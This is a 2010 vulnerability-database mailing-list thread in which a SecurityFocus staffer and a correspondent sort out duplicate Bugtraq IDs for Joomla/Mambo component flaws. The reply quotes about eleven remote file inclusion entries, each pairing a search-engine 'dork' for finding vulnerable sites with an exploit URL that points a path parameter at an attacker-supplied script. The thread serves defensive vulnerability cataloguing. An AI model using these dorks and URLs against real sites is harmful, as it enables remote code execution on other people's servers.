[VIM] Bugtraq Ids 19233 vs 44071
rkeith
rkeith at securityfocus.com
Thu Oct 14 11:09:22 CDT 2010
Hey George,
We'll look into that one, but most likely it is a duplicate. Some of the others are definitely duplicates.
This is what we found in our initial search:
BID 19222.
[+] Dork : inurl:index.php?option=?com_mambatstaff?
> > ---------------------------------------------------------------------------
> > [$] ExPLo!T : http://www.example.com/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=[IndonesianCoder]
BID 19574
---------------------------------------------------------------------------
[+] Dork : inurl:index.php?option=?com_mambelfish?
---------------------------------------------------------------------------
[$] ExPLo!T : http://www.example.com/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=[IndonesianCoder]
BID 19502
---------------------------------------------------------------------------
[+] Dork : inurl:index.php?option=?com_mmp?
---------------------------------------------------------------------------
[$] ExPLo!T : http://www.example.com/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=[IndonesianCoder]
BID 19124
---------------------------------------------------------------------------
[+] Dork : inurl:index.php?option=?com_moodle?
---------------------------------------------------------------------------
[$] ExPLo!T : http://www.example.com/components/com_moodle/moodle.php?mosConfig_absolute_path=[IndonesianCoder]
BID 19122
---------------------------------------------------------------------------
[+] Dork : inurl:index.php?option=?com_mospray?
---------------------------------------------------------------------------
[$] ExPLo!T : http://www.example.com/components/com_mospray/scripts/admin.php?basedir=[IndonesianCoder]
BID 19138
---------------------------------------------------------------------------
[+] Dork : inurl:index.php?option=?com_pcchess?
---------------------------------------------------------------------------
[$] ExPLo!T : http://www.example.com/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=[IndonesianCoder]
BID 19505
---------------------------------------------------------------------------
[+] Dork : inurl:index.php?option=?com_peoplebook?
---------------------------------------------------------------------------
[$] ExPLo!T : http://www.example.com/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=[IndonesianCoder]
BID 18968
---------------------------------------------------------------------------
[+] Dork : inurl:index.php?option=?com_performs?
---------------------------------------------------------------------------
[$] ExPLo!T : http://www.example.com/components/com_performs/performs.php?mosConfig_absolute_path=[IndonesianCoder]
BID 19100
---------------------------------------------------------------------------
[+] Dork : inurl:index.php?option=?com_multibanners?
---------------------------------------------------------------------------
[$] ExPLo!T : http://www.example.com/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=[IndonesianCoder]
BID 23129
[+] Dork : inurl:index.php?option=?com_admin?
---------------------------------------------------------------------------
[$] ExPLo!T : http://www.example.com/components/com_simpleboard/file_upload.php?sbp=[IndonesianCoder]
BID 19492
[+] Dork : inurl:index.php?option=?com_webring?
---------------------------------------------------------------------------
[$] ExPLo!T : http://www.example.com/administrator/components/com_webring/admin.webring.docs.php?component_dir=[IndonesianCoder]
-Rob
George A. Theall wrote:
> Bugtraq Ids 19233 and 44071 seem to cover the same issue, apart from the
> fact that the discussions talk of Mambo versus Joomla!. Since the issue
> is in a third-party component that works in either CMS, shouldn't the
> issue be covered by just one BID?
>
> Btw, I wouldn't be surprised if some of the other issues reported by
> jos_ali_joe as part of
> http://packetstormsecurity.org/1010-exploits/joomlamulti-rfi.txt are
> dups. Is anyone looking into them? Rob?
>
>
> George
More information about the VIM
mailing list